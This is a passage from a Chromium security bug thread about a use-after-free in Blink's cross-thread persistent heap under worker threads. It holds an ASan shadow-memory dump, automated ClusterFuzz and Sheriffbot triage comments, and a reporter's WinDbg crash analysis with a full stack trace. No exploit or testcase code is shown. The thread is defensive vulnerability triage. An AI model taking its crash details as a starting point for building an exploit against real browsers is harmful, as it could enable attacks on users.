0x317781f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x31778200: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x31778210: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x31778220: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x31778230: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x31778240: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x31778250: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==5652==ABORTING
,
Nov 13 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=6194746237386752.
,
Nov 14 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5425626982121472.
,
Nov 14 2017
Might be a duplicate of issue 777041 .
,
Nov 14 2017
Automatically applying components based on crash stacktrace and information from OWNERS files. If this is incorrect, please apply the Test-Predator-Wrong-Components label.
,
Nov 15 2017
The reproducer seems to be flaky, but it works, e.g. https://clusterfuzz.com/v2/testcase-detail/5425626982121472?noredirect=1 nhiroki@ and keishi@, could you please take a look?
,
Nov 15 2017
,
Nov 15 2017
This is a serious security regression. If you are not able to fix this quickly, please revert the change that introduced it. If this doesn't affect a release branch, or has not been properly classified for severity, please update the Security_Impact or Security_Severity labels, and remove the ReleaseBlock label. To disable this altogether, apply ReleaseBlock-NA. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 15 2017
,
Nov 15 2017
Please add affected OSs.
,
Nov 16 2017
keishi@: Regarding c#4, do you think this is related to issue 777041 ? According to the original report, looks like the thread T18 accessed memory allocated/freed by the thread T17. Per-thread heap region could be in a mess by some reason...?
,
Nov 16 2017
,
Nov 27 2017
keishi: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Dec 4 2017
Any progress on this bug?
,
Dec 7 2017
ClusterFuzz testcase 5425626982121472 is flaky and no longer crashes, so closing issue. If this is incorrect, please add ClusterFuzz-Wrong label and re-open the issue.
,
Dec 7 2017
Don't know what it means by saying "testcase is flaky" from the ClusterFuzz program.
But I can still reproduce it instantly with latest build:
Chrome Version: Google Chrome is up to date
Version 64.0.3278.0 (Official Build) dev (32-bit)
Operating System: Windows 10
(92c.78fc): Access violation - code c0000005 (!!! second chance !!!)
eax=4e841898 ebx=318a90d4 ecx=318a90c4 edx=0aec6cd8 esi=0aec6cd8 edi=00000006
eip=0f9af25d esp=0039eda0 ebp=0039eda4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
chrome_child!blink::PersistentBase<blink::(anonymous namespace)::DummyGCBase,blink::WeaknessPersistentConfiguration::kNonWeakPersistentConfiguration,blink::CrossThreadnessPersistentConfiguration::kCrossThreadPersistentConfiguration>::Get [inlined in chrome_child!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode+0x9]:
0f9af25d 8b00 mov eax,dword ptr [eax] ds:002b:4e841898=????????
8:162> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
chrome_child!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode+9 [C:\b\c\b\win_clang\src\third_party\WebKit\Source\platform\heap\PersistentNode.cpp @ 130]
0f9af25d 8b00 mov eax,dword ptr [eax]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 0f9af25d (chrome_child!blink::PersistentBase<blink::(anonymous namespace)::DummyGCBase,blink::WeaknessPersistentConfiguration::kNonWeakPersistentConfiguration,blink::CrossThreadnessPersistentConfiguration::kCrossThreadPersistentConfiguration>::Get)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 4e841898
Attempt to read from address 4e841898
FAULTING_THREAD: 000078fc
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: chrome.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 4e841898
READ_ADDRESS: 4e841898
FOLLOWUP_IP:
chrome_child!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode+9 [C:\b\c\b\win_clang\src\third_party\WebKit\Source\platform\heap\PersistentNode.cpp @ 130]
0f9af25d 8b00 mov eax,dword ptr [eax]
BUGCHECK_STR: INVALID_POINTER_READ
NTGLOBALFLAG: 400
APPLICATION_VERIFIER_FLAGS: 0
APP: chrome.exe
ANALYSIS_VERSION: 10.0.10240.9 x86fre
LAST_CONTROL_TRANSFER: from 0f9c1f65 to 0f9af25d
STACK_TEXT:
0039eda4 0f9c1f65 0aec6cd8 318a90d4 000000fa chrome_child!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode+0x9
0039ede0 0f9c1e4d 0aec6cd8 0f9af254 00000001 chrome_child!blink::PersistentRegion::TracePersistentNodes+0x73
0039ee2c 10310013 0aec6cd8 a9932d6f 41297ccf chrome_child!blink::ThreadHeap::VisitPersistentRoots+0x43
0039ee70 0f9c1833 00000000 0039ee8c 0039ef08 chrome_child!blink::ThreadState::MarkPhaseVisitRoots+0x65
0039ef0c 0f9c166a 00000000 00000001 00000000 chrome_child!blink::ThreadState::CollectGarbage+0xa1
0039efa8 114dbfab b1ac3654 41297ccf 0039efd8 chrome_child!blink::ThreadState::PerformIdleGC+0xc6
0039efb8 10ffa7ef 0a0b5eb8 b1ac3654 41297ccf chrome_child!base::internal::Invoker<base::internal::BindState<void (media::internal::TrampolineHelper<base::RepeatingCallback<void (double)> >::*)(double) __attribute__((thiscall)),std::unique_ptr<media::internal::TrampolineHelper<base::RepeatingCallback<void (double)> >,std::default_delete<media::internal::TrampolineHelper<base::RepeatingCallback<void (double)> > > > >,void (double)>::Run+0x19
0039efd8 0f9c1217 b1ac3654 41297ccf 745c1469 chrome_child!blink::`anonymous namespace'::IdleTaskRunner::Run+0x35
0039f000 0f9c11d1 31815058 745c1469 000000c2 chrome_child!blink::scheduler::WebSchedulerImpl::RunIdleTask+0x37
0039f018 0f4ecff5 0f9c11e0 0039f02c 0039f098 chrome_child!base::internal::FunctorTraits<void (*)(std::unique_ptr<blink::WebThread::IdleTask,std::default_delete<blink::WebThread::IdleTask> >, base::TimeTicks),void>::Invoke<std::unique_ptr<blink::WebThread::IdleTask,std::default_delete<blink::WebThread::IdleTask> >,base::TimeTicks>+0x2f
0039f038 1032bd84 0a06cca8 0039f098 000000c2 chrome_child!base::internal::Invoker<base::internal::BindState<void (*)(std::unique_ptr<blink::WebThread::IdleTask,std::default_delete<blink::WebThread::IdleTask> >, base::TimeTicks),base::internal::PassedWrapper<std::unique_ptr<blink::WebThread::IdleTask,std::default_delete<blink::WebThread::IdleTask> > > >,void (base::TimeTicks)>::Run+0x39
0039f0c4 1032c473 0a06cca8 7398206a 0aef028c chrome_child!blink::scheduler::SingleThreadIdleTaskRunner::RunTask+0x62
0039f0e0 1032c42b 1032bd22 00000000 0aef028c chrome_child!base::internal::FunctorTraits<void (blink::scheduler::SingleThreadIdleTaskRunner::*)(base::RepeatingCallback<void (base::TimeTicks)>) __attribute__((thiscall)),void>::Invoke<const base::WeakPtr<blink::scheduler::SingleThreadIdleTaskRunner> &,const base::RepeatingCallback<void (base::TimeTicks)> &>+0x39
0039f10c 0f4b7aa7 0aef0270 0039f160 0039f240 chrome_child!base::internal::Invoker<base::internal::BindState<void (blink::scheduler::SingleThreadIdleTaskRunner::*)(base::RepeatingCallback<void (base::TimeTicks)>) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::SingleThreadIdleTaskRunner>,base::RepeatingCallback<void (base::TimeTicks)> >,void ()>::Run+0x4d
0039f180 0f4ee842 125a2694 0039f240 0039f19c chrome_child!base::debug::TaskAnnotator::RunTask+0x97
0039f2ac 0f4ed609 06fd33b8 00000000 00000000 chrome_child!blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue+0x350
0039f360 0f4ed471 00000000 0f4ed47a 0039f3b0 chrome_child!blink::scheduler::TaskQueueManager::DoWork+0x18f
0039f37c 0f4b7aa7 06fb94a8 0039f3ac 775613ee chrome_child!base::internal::Invoker<base::internal::BindState<void (gpu::GpuWatchdogThread::*)(bool) __attribute__((thiscall)),base::WeakPtr<gpu::GpuWatchdogThread>,bool>,void ()>::Run+0x43
0039f3ec 10455013 125bf60c 0039f4a8 0039f480 chrome_child!base::debug::TaskAnnotator::RunTask+0x97
0039f3fc 0f4b7486 0039f4a8 125a2535 06fca508 chrome_child!base::internal::IncomingTaskQueue::RunTask+0x13
0039f480 1041ed4b 0039f4a8 0f4b692c 7398206a chrome_child!base::MessageLoop::RunTask+0x1b6
0039f4a0 0f4b26de 00000000 125a2598 125a2535 chrome_child!base::MessageLoop::DeferOrRunPendingTask+0x5b
0039f558 0f4b25e7 06fc2450 06fc2448 06fca49c chrome_child!base::MessageLoop::DoWork+0xde
0039f574 1041ec9f 06fca498 0039f5a8 0039f598 chrome_child!base::MessagePumpDefault::Run+0x87
0039f584 0f4b23ae 00000001 0039f5a0 0039f5a8 chrome_child!base::MessageLoop::Run+0x1f
0039f598 0f4a4ce4 06fa4f00 06fca498 06fca49c chrome_child!base::RunLoop::Run+0x2e
0039f644 0f4a4a80 0039f730 00000016 06f73fb0 chrome_child!content::RendererMain+0x1f8
0039f718 0f49eb4a 0039f748 0039f730 0039f8f0 chrome_child!content::RunNamedProcessTypeMain+0x10a
0039f770 0f4838f3 00000000 00000003 0039f88c chrome_child!content::ContentMainRunnerImpl::Run+0x92
0039f87c 0f4835d0 0039f888 0039f88c 125bad90 chrome_child!service_manager::Main+0x26c
0039f8bc 0f481d48 0039f8d8 0039f8c8 0039f8c4 chrome_child!content::ContentMain+0x31
0039f920 00ba2fe4 00ba0000 0039f968 74541560 chrome_child!ChromeMain+0x10a
0039f9ac 00ba1465 00ba0000 74541560 000000c2 chrome!MainDllLoader::Launch+0x22e
0039fb18 00c5e438 00ba0000 00000000 006932c8 chrome!wWinMain+0x465
0039fb64 75808654 004d2000 75808630 14cc5430 chrome!__scrt_common_main_seh+0xf6
0039fb78 77584a47 004d2000 16266eeb 00000000 KERNEL32!BaseThreadInitThunk+0x24
0039fbc0 77584a17 ffffffff 775a9eb3 00000000 ntdll!__RtlUserThreadStart+0x2f
0039fbd0 00000000 00c5e4b0 004d2000 00000000 ntdll!_RtlUserThreadStart+0x1b
FAULTING_SOURCE_LINE: C:\b\c\b\win_clang\src\third_party\WebKit\Source\platform\heap\PersistentNode.cpp
FAULTING_SOURCE_FILE: C:\b\c\b\win_clang\src\third_party\WebKit\Source\platform\heap\PersistentNode.cpp
FAULTING_SOURCE_LINE_NUMBER: 130
FAULTING_SOURCE_CODE:
121: T* operator->() const { return *this; }
122:
123: T* Get() const {
124: CheckPointer();
> 125: return raw_;
126: }
127:
128: template <typename U>
129: PersistentBase& operator=(U* other) {
130: Assign(other);
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: chrome_child!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode+9
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: chrome_child
IMAGE_NAME: chrome_child.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5a1912cf
STACK_COMMAND: ~162s ; kb
BUCKET_ID: INVALID_POINTER_READ_chrome_child!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode+9
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_chrome_child!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode+9
FAILURE_PROBLEM_CLASS: INVALID_POINTER_READ
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: chrome_child.dll
FAILURE_FUNCTION_NAME: blink::CrossThreadPersistentRegion::ShouldTracePersistentNode
FAILURE_SYMBOL_NAME: chrome_child.dll!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_chrome_child.dll!blink::CrossThreadPersistentRegion::ShouldTracePersistentNode
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_chrome_child.dll!blink::crossthreadpersistentregion::shouldtracepersistentnode
FAILURE_ID_HASH: {28d2ce5b-6d23-b6da-6b00-43597c3c7d3d}
Followup: MachineOwner
---------
,
Mar 15 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||
►
Sign in to add a comment |
|||||||||
Comment 1 by dominickn@chromium.org
, Nov 13 2017Components: Blink>Workers
Labels: Security_Impact-Head
Owner: nhiroki@chromium.org
Status: Assigned (was: Unconfirmed)